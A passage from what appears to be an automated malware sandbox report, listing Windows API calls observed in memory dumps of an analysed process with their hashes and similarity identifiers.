                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: d2ac24ed47f1989d168741db9132d70aeb3ccbd9d11252471cb26770b06fcf22
                                                    • Instruction ID: 2cf63aee6a4742f761d014e3a2d986e28562fb64dd4e873f9c84cc4136965cbe
                                                    • Opcode Fuzzy Hash: d2ac24ed47f1989d168741db9132d70aeb3ccbd9d11252471cb26770b06fcf22
                                                    • Instruction Fuzzy Hash: 4B11A375500705DFEB21DF59D844B56FBE4EF04221F04C46AED458B612D371E414CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01DEB329
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 7970d68453bb92fe6443908b7d11362328c79903a2f9d9e846b3d42db4434fb9
                                                    • Instruction ID: 109edb54059839593dc622acb666b1edf9f0d1d5ba3ad234dbebd952a784c3f4
                                                    • Opcode Fuzzy Hash: 7970d68453bb92fe6443908b7d11362328c79903a2f9d9e846b3d42db4434fb9
                                                    • Instruction Fuzzy Hash: 9011A071509780AFDB228F15DC45F62FFB4EF06220F09849BED844B663C275A918DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01DEB329
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 11aacef32faf43e4617a8f26b9ac979f4953303a339dc5cdb9ff490ec4e4a509
                                                    • Instruction ID: 01df119b6dc12a71a38471cf7fca7387616f39f1c8145568309180d0746163c8
                                                    • Opcode Fuzzy Hash: 11aacef32faf43e4617a8f26b9ac979f4953303a339dc5cdb9ff490ec4e4a509
                                                    • Instruction Fuzzy Hash: 1401AD36400700DFEB219F19D88AB25FBE0EF08721F08C09BDD894B612C275F418DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027C01D0
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 3dbd80381d4b3a0d93551c0640e503d573da8368b4a011ed68ebcdc1cc349e38
                                                    • Instruction ID: 41fa2d9d9619c28408c59ebc9826eefe10797d8d77419f46ab17141e81b3a99b
                                                    • Opcode Fuzzy Hash: 3dbd80381d4b3a0d93551c0640e503d573da8368b4a011ed68ebcdc1cc349e38
                                                    • Instruction Fuzzy Hash: 1E31397654E3C08FD7138B759C65692BFB4AF03310B0E84DBD884CF1A3D6259909D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 027C072D
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 3e10800ffc73a6caa42378eadbdd4cd95ad5ecbbe9327f70c6a7fe3b9add0690
                                                    • Instruction ID: a3e230970df089fa3fdd1ea6bcb15f9e41a109a3dfdf7e460e358c99991ed502
                                                    • Opcode Fuzzy Hash: 3e10800ffc73a6caa42378eadbdd4cd95ad5ecbbe9327f70c6a7fe3b9add0690
                                                    • Instruction Fuzzy Hash: 7C317071504380AFE722CF65CC45F52BFF8EF05310F0984AEE9888B292D325A908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 027C0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 1a40a207d0744221e2f1967a0aac2688231811b788028ffbe5153c13b42b5223
                                                    • Instruction ID: f48e489ca6f2ac25589b835f7d1160fb363bd5bb788579eabe67cdccaf8cba46
                                                    • Opcode Fuzzy Hash: 1a40a207d0744221e2f1967a0aac2688231811b788028ffbe5153c13b42b5223
                                                    • Instruction Fuzzy Hash: 9B3186B1509380AFE712CB25DC45B96BFE8DF06314F1884AEE944CB293D375A905C775
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 01DEBDBC
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: f0db943a4e4549be830d4db29dc250a20067332a47e745dda485a9933f7203d5
                                                    • Instruction ID: 35e030ed26085325c17cd382fee5b5ba47045d06a1a642856d79a93f95b5468f
                                                    • Opcode Fuzzy Hash: f0db943a4e4549be830d4db29dc250a20067332a47e745dda485a9933f7203d5
                                                    • Instruction Fuzzy Hash: 19318172509380AFE722CB61DC55F96BFB8EF06210F0885DBE985DB193D225A908C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 01DEAFBE
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: ac5b0ca0cdc34ec37711cd7db25839dcfd9a6665ff2fa309364152b561d49aa2
                                                    • Instruction ID: a33a014d16655350099e03c52a69d51feead284618001dba1463f1eed9e1bcaa
                                                    • Opcode Fuzzy Hash: ac5b0ca0cdc34ec37711cd7db25839dcfd9a6665ff2fa309364152b561d49aa2
                                                    • Instruction Fuzzy Hash: 2821D6B2509780AFE712CF24DC45B96BFB8EF06320F0884DBE985DB193D265A949C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 027C109E
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: fb0a0ee741367ddaff6f635f0ad6222948e1da838f4ec6e82e27cd2bc0de07b8
                                                    • Instruction ID: 897b2ff1864b09e8fb6c1f34ed82a1bc01e71bbe9ba1f9dd815f0d7172bfd87c
                                                    • Opcode Fuzzy Hash: fb0a0ee741367ddaff6f635f0ad6222948e1da838f4ec6e82e27cd2bc0de07b8
                                                    • Instruction Fuzzy Hash: C5315E7550E3C06FD3138B358C55B66BFB4AF43610F1A81DBD8848F2A3D629A919C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 01DEB0AE
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: f434d9920c1a2fab521c21888a1f09a9ade56bb80fa632b3682a6716c496093e
                                                    • Instruction ID: 7c30e20e7d2e70a2eb43999b9b8017226aab9ee50cc62fb845dfcb3efc5578d0
                                                    • Opcode Fuzzy Hash: f434d9920c1a2fab521c21888a1f09a9ade56bb80fa632b3682a6716c496093e
                                                    • Instruction Fuzzy Hash: AE218371505380AFE722CF25DC45FA6BFF8EF46220F08849BE945DB152D664E948CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 027C0819
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 57715c8351364a128bac022a5535317c2026d1e77463797c5666ec8134df3413
                                                    • Instruction ID: 96c3b6f5908064049a84a5c9648b8045f43e74d4a35c7d0213a399072141ce6f
                                                    • Opcode Fuzzy Hash: 57715c8351364a128bac022a5535317c2026d1e77463797c5666ec8134df3413
                                                    • Instruction Fuzzy Hash: 7C21FC76408780AFE712CB259C45FA3BFA8EF46720F1981DBF9848B193D224A905C7B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01DEA23E
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: dc9137183b891a7e028f47946812dc565543d6b43beffe9e73d4dfe68a93fed4
                                                    • Instruction ID: 766785e0d1fc07e2218e055f7af29fd359a9c0da50bb895412e3019b0776f9a8
                                                    • Opcode Fuzzy Hash: dc9137183b891a7e028f47946812dc565543d6b43beffe9e73d4dfe68a93fed4
                                                    • Instruction Fuzzy Hash: 0721C77184D3C06FD312CB258C55B66BFB4EF47620F1981DBD884CF293D229A919C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 027C0502
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: d4a1579bdb9e474bcc192c63273b150afc4f33b2a82497fa7d40612be531b3d9
                                                    • Instruction ID: b976185edee3c0aa759a694a19906cc0f61d383d7e4faf33da026fe9b47c733c
                                                    • Opcode Fuzzy Hash: d4a1579bdb9e474bcc192c63273b150afc4f33b2a82497fa7d40612be531b3d9
                                                    • Instruction Fuzzy Hash: C5217F7640E7C0AFD3128B358C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 027C072D
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: f7e95b8c758cd8cee7204e69103c9a906ff2e5bd23e2619da74a4e1056593f57
                                                    • Instruction ID: d7f96d25eb6db40e334e241b94550e7c1b3ec93d4e0b0376332353cbca4f4eb9
                                                    • Opcode Fuzzy Hash: f7e95b8c758cd8cee7204e69103c9a906ff2e5bd23e2619da74a4e1056593f57
                                                    • Instruction Fuzzy Hash: 97219A71500700EFEB21DF65CD85B66FBE8EF08310F14846EE9899A292D331E904CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 027C08E5
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 7b48cd40da4443a341b1360722f8c5c0c1add12d23ce01acb5c9f9c11e1e0ada
                                                    • Instruction ID: 5612ae75bd916a615a30e6f2e4be91ca389aab2362aae06b1e7f1c2a1265a9c6
                                                    • Opcode Fuzzy Hash: 7b48cd40da4443a341b1360722f8c5c0c1add12d23ce01acb5c9f9c11e1e0ada
                                                    • Instruction Fuzzy Hash: D5219272409380AFE722CF61DC45F56BFB8EF06314F0984DFE9449B153C265A909CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01DEA94A
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 86c70f5d5ce61dd72b7121eda1ab3c4d82d276e203e44860a3dcb10e71ed2dcc
                                                    • Instruction ID: ddc4cc6cceb1e91fcf143b66f6be9b284e8f07e1adaefca20d319bdd2f023ddb
                                                    • Opcode Fuzzy Hash: 86c70f5d5ce61dd72b7121eda1ab3c4d82d276e203e44860a3dcb10e71ed2dcc
                                                    • Instruction Fuzzy Hash: 5C21A77540D780AFD3138B25DC51B62BFB4EF87720F0981DBE8848B653D224A919C7B6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 027C0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 01DEBDBC
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 027C0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 01DEB0AE
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01DEAB1A
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 027C1148
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 01DEAFBE
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 027C08E5
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01DEBA7E
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 027C132F
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 027C099C
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01DEAB1A
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01DEAA71
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 027C0819
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01DEABC9
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01DEBA7E
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 027C109E
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027C01D0
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01DEA23E
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 027C132F
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 027C0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 027C0502
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01DEA94A
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01DEABC9
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 027C1148
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 027C099C
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01DEAA71
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE ref: 027C0640
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01DEA9C8
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01DEA9C8
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2190488236.0000000002B40000.00000040.00000001.sdmp, Offset: 02B40000, based on PE: false
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182969947.0000000001DE2000.00000040.00000001.sdmp, Offset: 01DE2000, based on PE: false
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182969947.0000000001DE2000.00000040.00000001.sdmp, Offset: 01DE2000, based on PE: false
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions